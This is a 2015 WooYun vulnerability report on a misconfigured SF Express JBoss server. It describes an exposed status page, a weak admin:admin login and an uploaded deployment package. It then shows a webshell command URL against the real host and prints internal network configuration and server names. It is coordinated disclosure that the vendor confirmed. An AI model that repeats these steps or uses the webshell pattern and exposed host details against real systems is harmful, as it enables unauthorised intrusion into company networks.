当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-090568
漏洞标题:
顺丰速运某系统配置不当导致可获取系统权限
相关厂商:
顺丰速运
漏洞作者:
猪猪侠
提交时间:
2015-01-07 21:55
修复时间:
2015-02-21 21:56
公开时间:
2015-02-21 21:56
漏洞类型:
应用配置错误
危害等级:
自评Rank:
20
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-08: 厂商已经确认,细节仅向厂商公开
2015-01-18: 细节向核心白帽子及相关领域专家公开
2015-01-28: 细节向普通白帽子公开
2015-02-07: 细节向实习白帽子公开
2015-02-21: 细节向公众公开

简要描述:

手动找的,弯弯绕绕,这里一点信息,那里一点信息,拼凑出了大问题,所以呢,一定要有耐心

详细说明:

域名:https://sfadp.sf-express.com

domain.jpg


#1 https://219.134.187.215
看到一个JBOSS的页面,但是jmx-console,web-console被删除了
但是呢 status (Tomcat status) 没删除,怪我咯?结果把后台又给暴漏了

1.jpg


#2 发现其他路径

2.jpg


#3 这里又是一个弱口令,进入部署后台 admin:admin

3.jpg

漏洞证明:

#4 上传一个部署包,系统权限就到手了

4.jpg


https://219.134.187.215/a/pwn.jsp?cmd=ipconfig%20/all

Windows IP 配置
   主机名  . . . . . . . . . . . . . : sfa-DP
   主 DNS 后缀 . . . . . . . . . . . : 
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   物理地址. . . . . . . . . . . . . : 00-50-56-89-2A-DA
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::ec8b:8740:2a12:6796%11(首选) 
   IPv4 地址 . . . . . . . . . . . . : 10.0.80.101(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.0.80.254
   DHCPv6 IAID . . . . . . . . . . . : 234901590
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1A-CE-73-CF-00-50-56-89-2A-DA
   DNS 服务器  . . . . . . . . . . . : 10.0.15.2
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用
隧道适配器 isatap.{5F1B9895-B9F6-40A9-8661-C8EAB76E20E2}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:90d7:3077:c25:f5ff:af9a(首选) 
   本地链接 IPv6 地址. . . . . . . . : fe80::3077:c25:f5ff:af9a%18(首选) 
   默认网关. . . . . . . . . . . . . : ::
   TCPIP 上的 NetBIOS  . . . . . . . : 已禁用


服务器名称            注解
-------------------------------------------------------------------------------
\\AIR-INTERFACE-2                                                              
\\AIR-SITA                                                                     
\\AIR-UMS-APP                                                                  
\\FOC-WEB                                                                      
\\SF-E6433414B3C1                                                              
\\SF-PNS                                                                       
\\SF-PNS-BAK                                                                   
\\SFA-DP                                                                       
\\WIN-DBTH3GQD9VH                                                              
\\WIN-EEQ3AURP80P                                                              
命令成功完成。

修复方案:

# 删除干净

版权声明:转载请注明来源 猪猪侠@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-08 18:32

厂商回复:

非常感谢,已安排研发进行整改。

最新状态:

暂无